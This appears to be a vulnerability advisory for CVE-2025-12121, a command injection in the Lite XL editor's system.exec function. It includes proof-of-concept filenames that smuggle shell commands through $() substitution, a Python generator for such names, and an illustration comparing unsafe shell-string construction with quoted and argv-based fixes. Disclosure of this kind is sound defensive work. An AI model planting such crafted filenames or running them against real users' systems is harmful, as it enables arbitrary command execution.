Security Vulnerability Report
CVE-2025-12121 CVSS 7.3 HIGH

CVE-2025-12121

Published: 2025-11-20 17:15:49
Last Modified: 2025-12-10 17:45:48

Description

Lite XL versions 2.1.8 and prior contain a vulnerability in the system.exec function, which allowed arbitrary command execution through unsanitized shell command construction. This function was used in project directory launching (core.lua), drag-and-drop file handling (rootview.lua), and the “open in system” command in the treeview plugin (treeview.lua). If an attacker could influence input to system.exec, they might execute arbitrary commands with the privileges of the Lite XL process.

CVSS Details

CVSS Score: 7.3 (Exploitability 1.3, Impact 5.9)
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
Attack Vector: Local; Attack Complexity: Low; Privileges Required: Low; User Interaction: Required; Scope: Unchanged; Confidentiality, Integrity and Availability Impact: High
Weakness: CWE-78 (OS Command Injection)

Configurations (Affected Products)

cpe:2.3:a:lite-xl:lite_xl:*:*:*:*:*:*:*:* - VULNERABLE
Lite XL <= 2.1.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12121 PoC - Lite XL Command Injection
# Affected: Lite XL <= 2.1.8
# Attack Vector: Create a malicious filename with shell commands

# Method 1: Via drag-and-drop (rootview.lua)
# Create a file with malicious name in project directory
malicious_filename = 'test$(touch /tmp/pwned).txt'
# When user drags this file, arbitrary command executes

# Method 2: Via treeview "Open in System" (treeview.lua)
# Similar payload in file name
malicious_file = '$(calc.exe).txt'

# Method 3: Via project directory launching (core.lua)
# Create malicious entry in project configuration
# The path will be passed to system.exec without sanitization

# Exploitation example (Unix-like systems):
# touch 'test$(whoami>pwned).txt'
# When processed by Lite XL, the command in $() will execute

# Python PoC to generate malicious filenames:
import os
payload = '$(echo PWNED > /tmp/cve-2025-12121)'
malicious_name = f'malicious_file{payload}.txt'
print(f'Malicious filename: {malicious_name}')
# When Lite XL processes this filename via system.exec,
# the command inside $() will be executed
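As an added illustration, not code from the advisory or from the Lite XL code base, the following Python analogue contrasts the unsafe pattern the description names (a filename interpolated into a shell command string) with its hardened forms (the path shell-quoted when a shell is unavoidable, or passed as a single argv element with no shell at all). It uses a constructed filename shaped like the PoC payload but with a harmless substitution, `printf` as a stand-in for the real "open in system" command, and assumes a POSIX `/bin/sh`.

```python
import shlex
import subprocess

# Constructed sample input: the same shape as the PoC payload, but the
# command substitution is harmless so the difference stays observable.
SAMPLE_NAME = "test$(echo PWNED).txt"

# Characters that let a filename change the structure of a shell command.
SHELL_META = set("$`;|&<>(){}\n\"'\\*?")


def has_shell_metachars(name: str) -> bool:
    """Validation check: does this name contain shell metacharacters?
    Useful as an input guard or a log-side detector; quoting is still
    required, because a block-list alone is never complete."""
    return any(ch in SHELL_META for ch in name)


def run_shell(cmd: str) -> str:
    """Run one command string through /bin/sh and return its stdout."""
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def open_path_vulnerable(path: str) -> str:
    """Analogue of the unsafe pattern: the path is concatenated into one
    command string that the shell parses, so $(...) in the name is run.
    printf stands in for the real 'open' command (assumption)."""
    return run_shell(f"printf '%s\\n' {path}")


def open_path_quoted(path: str) -> str:
    """Hardened form A: if a shell must be used, quote the argument so the
    shell sees it as one literal word."""
    return run_shell(f"printf '%s\\n' {shlex.quote(path)}")


def open_path_argv(path: str) -> str:
    """Hardened form B (preferred): no shell at all; the path is one argv
    element and nothing interprets $(...)."""
    return subprocess.run(["printf", "%s\n", path],
                          capture_output=True, text=True).stdout.strip()


if __name__ == "__main__":
    print("vulnerable:", open_path_vulnerable(SAMPLE_NAME))  # testPWNED.txt
    print("quoted:    ", open_path_quoted(SAMPLE_NAME))      # test$(echo PWNED).txt
    print("argv:      ", open_path_argv(SAMPLE_NAME))        # test$(echo PWNED).txt
```

Only the first call changes the output, which is the observable signature of CWE-78: the name was parsed as shell syntax rather than treated as data.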

References

https://github.com/lite-xl/lite-xl/pull/2163 (Patch)
https://kb.cert.org/vuls/id/579478 (Exploit, Patch, Third Party Advisory)